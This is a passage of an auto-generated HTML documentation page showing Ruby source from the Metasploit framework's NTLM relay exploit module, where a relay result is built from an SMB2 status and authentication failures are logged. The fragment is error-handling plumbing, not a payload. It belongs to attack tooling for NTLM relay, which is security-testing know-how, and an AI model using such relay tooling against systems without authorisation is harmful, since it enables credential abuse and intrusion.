<span class='const'><span class='object_link'><a href="../../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>RelayResult</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span>
<span class='label'>nt_status:</span> <span class='const'><span class='object_link'><a href="../../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='period'>.</span><span class='id identifier rubyid_find_by_retval'>find_by_retval</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span>
<span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'>Exception</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_msg'>msg</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Unable to authenticate to target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'> via relay</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_msg'>msg</span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_error'>error</span> <span class='id identifier rubyid_msg'>msg</span>
<span class='kw'>nil</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:05:36 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink